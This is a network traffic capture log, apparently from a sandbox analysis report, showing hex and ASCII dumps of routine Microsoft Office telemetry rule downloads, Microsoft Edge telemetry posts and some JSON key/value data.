2024-11-11 09:33:26 UTC	16384	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 30 39 63 34 37 36 32 37 62 63 35 33 33 62 35 39 32 34 61 30 35 35 61 30 34 62 63 34 63 33 33 65 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 39 2e 35 38 33 34 34 30 31 37 37 34 34 37 38 34 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 65 36 33 34 65 62 32 30 64 62 35 30 38 65 33 61 33 31 62 36 31 34 38 31 61 32 35 31 62 66 39 33 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 30 2e 33 33 37 30 36 38 35 39 32 37 38 32 37 33 35 0d 0a 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: { "key": "09c47627bc533b5924a055a04bc4c33e", "value": 9.58344017744784 }, { "key": "e634eb20db508e3a31b61481a251bf93", "value": -0.337068592782735
2024-11-11 09:33:26 UTC	16384	IN	Data Raw: 30 37 37 37 34 37 33 33 30 39 35 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 31 32 62 62 65 66 63 30 35 64 35 31 34 32 65 37 65 62 36 38 36 66 61 64 38 64 65 61 39 32 31 31 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 31 2e 30 35 37 31 37 37 35 33 31 31 38 30 39 34 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 63 65 35 66 62 38 64 66 31 32 35 61 34 37 32 31 64 31 64 66 33 32 38 62 63 36 66 32 64 64 65 61 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a Data Ascii: 07774733095 }, { "key": "12bbefc05d5142e7eb686fad8dea9211", "value": -1.05717753118094 }, { "key": "ce5fb8df125a4721d1df328bc6f2ddea", "value":
2024-11-11 09:33:26 UTC	16384	IN	Data Raw: 20 2d 31 2e 39 30 31 33 34 36 37 39 37 33 36 34 32 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 66 32 33 35 64 63 66 36 62 34 32 39 62 61 34 31 36 64 63 65 37 34 64 34 62 36 66 62 63 34 37 62 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 31 2e 32 36 30 31 38 31 31 38 35 36 30 38 38 34 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 63 38 66 31 37 64 37 34 30 33 61 63 35 66 66 32 38 39 36 61 37 31 33 61 37 31 37 35 65 64 31 39 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 Data Ascii: -1.9013467973642 }, { "key": "f235dcf6b429ba416dce74d4b6fbc47b", "value": 1.26018118560884 }, { "key": "c8f17d7403ac5ff2896a713a7175ed19", "va
2024-11-11 09:33:26 UTC	16384	IN	Data Raw: 36 62 64 32 65 65 33 36 63 30 33 66 36 66 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 35 2e 38 35 39 38 36 34 33 39 33 34 36 35 37 36 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 65 66 64 32 61 66 36 30 63 38 35 30 31 39 33 31 63 62 39 63 37 33 36 62 35 61 64 37 34 66 36 35 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 33 2e 39 35 36 39 39 35 33 35 33 36 34 30 30 33 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 32 63 38 34 38 35 34 38 64 34 36 30 63 Data Ascii: 6bd2ee36c03f6f", "value": 5.85986439346576 }, { "key": "efd2af60c8501931cb9c736b5ad74f65", "value": 3.95699535364003 }, { "key": "2c848548d460c
2024-11-11 09:33:26 UTC	16384	IN	Data Raw: 20 22 6b 65 79 22 3a 20 22 65 31 36 38 36 30 37 38 64 31 62 36 30 64 33 35 31 64 61 35 61 38 37 35 34 33 61 32 61 36 36 33 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 37 2e 35 30 36 36 35 35 32 34 32 36 32 35 35 31 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 33 61 33 34 31 37 66 35 66 32 30 61 30 33 61 39 38 39 37 33 36 38 39 38 38 37 66 62 37 32 61 32 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 31 2e 37 34 39 32 32 35 31 37 36 34 32 37 39 34 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 Data Ascii: "key": "e1686078d1b60d351da5a87543a2a663", "value": 7.50665524262551 }, { "key": "3a3417f5f20a03a98973689887fb72a2", "value": -1.74922517642794 }, {
2024-11-11 09:33:26 UTC	16384	IN	Data Raw: 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 62 30 64 61 32 37 35 35 32 30 39 31 38 65 32 33 64 64 36 31 35 65 32 61 37 34 37 35 32 38 66 31 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 30 2e 39 37 36 31 34 30 37 39 32 39 31 35 33 37 33 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 63 66 61 62 31 62 61 38 63 36 37 63 37 63 38 33 38 64 62 39 38 64 36 36 36 66 30 32 61 31 33 32 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 31 2e 31 31 37 38 37 35 38 36 30 34 35 30 39 34 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a Data Ascii: { "key": "b0da275520918e23dd615e2a747528f1", "value": -0.976140792915373 }, { "key": "cfab1ba8c67c7c838db98d666f02a132", "value": -1.11787586045094 },
2024-11-11 09:33:26 UTC	16053	IN	Data Raw: 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 64 65 39 35 62 34 33 62 63 65 65 62 34 62 39 39 38 61 65 64 34 61 65 64 35 63 65 66 31 61 65 37 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 31 2e 30 33 33 31 39 35 35 36 37 30 31 31 37 37 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 61 64 64 65 63 34 32 36 39 33 32 65 37 31 33 32 33 37 30 30 61 66 61 31 39 31 31 66 38 66 31 63 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 30 2e 31 36 30 39 38 34 33 32 38 39 38 35 39 32 34 0d Data Ascii: }, { "key": "de95b43bceeb4b998aed4aed5cef1ae7", "value": -1.03319556701177 }, { "key": "addec426932e71323700afa1911f8f1c", "value": 0.160984328985924

Session ID	Source IP	Source Port	Destination IP	Destination Port
80	192.168.2.5	49867	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:26 UTC	192	OUT	GET /rules/rule120645v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:27 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:26 GMT Content-Type: text/xml Content-Length: 425 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BBA25094F" x-ms-request-id: 63eb2845-501e-00a3-1dd5-33c0f2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093326Z-174f7845968l4kp6hC1EWRe884000000052g0000000017wp x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:27 UTC	425	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=

Session ID	Source IP	Source Port	Destination IP	Destination Port
81	192.168.2.5	49868	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:26 UTC	192	OUT	GET /rules/rule120646v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:27 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:26 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2BE84FD" x-ms-request-id: 22e15e04-b01e-0070-3ed5-331cc0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093326Z-174f7845968px8v7hC1EWR08ng000000051g000000002vep x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:27 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
82	192.168.2.5	49869	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:27 UTC	192	OUT	GET /rules/rule120647v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:27 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:27 GMT Content-Type: text/xml Content-Length: 448 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB389F49B" x-ms-request-id: bdd7469a-701e-0053-5fd5-333a0a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093327Z-174f7845968l4kp6hC1EWRe88400000004x00000000098tf x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:27 UTC	448	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.5	49865	20.50.73.10	443	7640	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:27 UTC	1043	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1731317605190&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 9498 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=18874E57A98C67C518B55B63A89566FE; _EDGE_S=F=1&SID=143A1788354267EB0AE802BC343E6686; _EDGE_V=1; _C_ETH=1; msnup=
2024-11-11 09:33:27 UTC	9498	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 31 2d 31 31 54 30 39 3a 33 33 3a 32 35 2e 31 38 39 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 34 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 63 30 62 66 63 61 64 37 2d 33 65 30 63 2d 34 34 37 33 2d 38 32 61 35 2d 31 36 32 32 37 34 39 62 39 39 37 31 22 2c 22 65 70 6f 63 68 22 3a 22 34 32 39 32 38 33 34 35 39 31 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 Data Ascii: {"name":"MS.News.Web.ContentView","time":"2024-11-11T09:33:25.189Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"c0bfcad7-3e0c-4473-82a5-1622749b9971","epoch":"4292834591"},"app":{"loc
2024-11-11 09:33:27 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=7fd2364b509d49ddaccc9456a8a42420&HASH=7fd2&LV=202411&V=4&LU=1731317607294; Domain=.microsoft.com; Expires=Tue, 11 Nov 2025 09:33:27 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=7d61f17e66d84e4e97aa0cc14d10a74a; Domain=.microsoft.com; Expires=Mon, 11 Nov 2024 10:03:27 GMT; Path=/;Secure; SameSite=None time-delta-millis: 2104 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Mon, 11 Nov 2024 09:33:27 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
84	192.168.2.5	49870	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:27 UTC	192	OUT	GET /rules/rule120648v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:27 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:27 GMT Content-Type: text/xml Content-Length: 491 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B98B88612" x-ms-request-id: b80249cf-101e-0017-2bd5-3347c7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093327Z-174f7845968cpnpfhC1EWR3afc00000004eg000000001ddw x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:27 UTC	491	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
85	192.168.2.5	49871	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:27 UTC	192	OUT	GET /rules/rule120649v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:27 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:27 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT ETag: "0x8DC582BAEA4B445" x-ms-request-id: 7cd113ea-e01e-0052-21d5-33d9df000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093327Z-174f7845968nnm4mhC1EWR1rn400000004t00000000016ax x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:27 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.5	49866	20.50.73.10	443	7640	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:27 UTC	1033	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1731317605396&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 5325 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=18874E57A98C67C518B55B63A89566FE; _EDGE_S=F=1&SID=143A1788354267EB0AE802BC343E6686; _EDGE_V=1; msnup=
2024-11-11 09:33:27 UTC	5325	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 31 2d 31 31 54 30 39 3a 33 33 3a 32 35 2e 33 39 33 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 35 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 63 30 62 66 63 61 64 37 2d 33 65 30 63 2d 34 34 37 33 2d 38 32 61 35 2d 31 36 32 32 37 34 39 62 39 39 37 31 22 2c 22 65 70 6f 63 68 22 3a 22 34 32 39 32 38 33 34 35 39 31 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-11-11T09:33:25.393Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"c0bfcad7-3e0c-4473-82a5-1622749b9971","epoch":"4292834591"},"app":{"locale
2024-11-11 09:33:27 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=1f385fb805d847059bd49cbc8a2fda7a&HASH=1f38&LV=202411&V=4&LU=1731317607156; Domain=.microsoft.com; Expires=Tue, 11 Nov 2025 09:33:27 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=5f6bb1f8941e437fa9dab6ed94204481; Domain=.microsoft.com; Expires=Mon, 11 Nov 2024 10:03:27 GMT; Path=/;Secure; SameSite=None time-delta-millis: 1760 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: 